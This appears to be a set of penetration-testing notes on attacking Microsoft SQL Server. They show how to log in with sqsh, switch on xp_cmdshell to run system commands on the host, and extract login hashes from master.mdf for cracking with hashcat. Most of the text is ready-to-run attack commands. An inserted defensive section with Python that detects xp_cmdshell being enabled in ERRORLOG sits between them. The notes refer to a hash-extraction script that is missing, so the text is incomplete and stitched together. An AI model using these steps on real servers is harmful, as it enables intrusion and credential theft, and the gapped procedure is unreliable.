MSSQL

Microsoft SQL Server behaves much like other SQL databases, and it can be accessed with the sqsh tool:

sqsh -S 10.11.1.31 -U test -P "password"

Remote Shell - XP_Cmdshell

Operating system commands can be executed on the host running MSSQL through the sqsh tool once the xp_cmdshell extended procedure is enabled.

The following commands enable xp_cmdshell (the RECONFIGURE after 'show advanced options' is required before the xp_cmdshell option can be changed):

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go

The following command executes a command on the remote system:

xp_cmdshell 'whoami';
go

If there is trouble enabling xp_cmdshell, disable it and re-enable it using the following commands:

-- Disable
USE master
GO
EXEC master.dbo.sp_configure 'xp_cmdshell', 0
RECONFIGURE WITH OVERRIDE
GO
EXEC master.dbo.sp_configure 'show advanced options', 0
RECONFIGURE WITH OVERRIDE
GO

-- Enable
USE master
GO
EXEC master.dbo.sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
GO
EXEC master.dbo.sp_configure 'xp_cmdshell', 1
RECONFIGURE WITH OVERRIDE
GO
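From the defensive side, every sp_configure change above leaves a line in the SQL Server ERRORLOG ("Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install."). The following Python is an added detection example, not part of the original notes: it parses such lines and alerts when xp_cmdshell (or a similar option) is switched on, flagging whether the same session flipped 'show advanced options' first, which is the sequence the enable snippet produces. The log lines are constructed samples in the ERRORLOG format.

```python
import re
from datetime import datetime

# Line SQL Server writes to its ERRORLOG whenever sp_configure changes an option, e.g.
# "2024-03-08 11:02:17.41 spid58      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install."
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options whose enablement should raise an alert on a production instance.
WATCHED = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}


def parse_config_changes(lines):
    """Return one dict per sp_configure change line, in log order."""
    events = []
    for line in lines:
        m = CONFIG_CHANGE.match(line.strip())
        if m:
            events.append({"time": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                           "spid": m["spid"], "option": m["option"],
                           "old": int(m["old"]), "new": int(m["new"])})
    return events


def find_enablements(lines):
    """Alert when a watched option goes from 0 to non-zero; record whether the same
    session (spid) turned on 'show advanced options' earlier in the log."""
    events = parse_config_changes(lines)
    alerts = []
    for i, ev in enumerate(events):
        if ev["option"] in WATCHED and ev["old"] == 0 and ev["new"] != 0:
            precursor = any(p["spid"] == ev["spid"] and p["option"] == "show advanced options"
                            and p["new"] == 1 for p in events[:i])
            alerts.append({"time": ev["time"], "spid": ev["spid"],
                           "option": ev["option"], "advanced_options_first": precursor})
    return alerts


# Constructed sample ERRORLOG lines (not from a real server), mirroring the enable
# and disable sequences shown above plus an unrelated line that must be ignored.
SAMPLE_LOG = [
    "2024-03-08 11:02:17.41 spid58      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-03-08 11:02:17.52 spid58      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-03-08 11:02:20.00 spid58      Error: 15281, Severity: 16, State: 1.",
    "2024-03-08 11:05:40.10 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
    "2024-03-08 11:05:41.00 spid61      Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.",
]
```

Running find_enablements(SAMPLE_LOG) yields a single alert for spid58 enabling xp_cmdshell with the 'show advanced options' precursor; the later disable by spid61 is not reported.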

Master Database File

The master.mdf file records all system-level information for a SQL Server instance. It holds instance-wide metadata such as logins, endpoints, linked servers and system configuration settings, and it also records the existence of every database and the location of all database files.

This file cannot be read while the instance is running, because the MSSQL process holds a lock on it. If you do have access to it, however, the login credentials can be extracted from it.

The passwords are stored in the file as hashes; they can be extracted using the following method, and the hashes can then be cracked with hashcat.

The above script extracts the hashes. On a Linux system, the PowerShell script can be run with pwsh.

The hash can be cracked as follows (hashcat mode 1731 is the MSSQL 2012/2014 hash type):

hashcat -a 0 -m 1731 hash /usr/share/wordlists/rockyou.txt --show
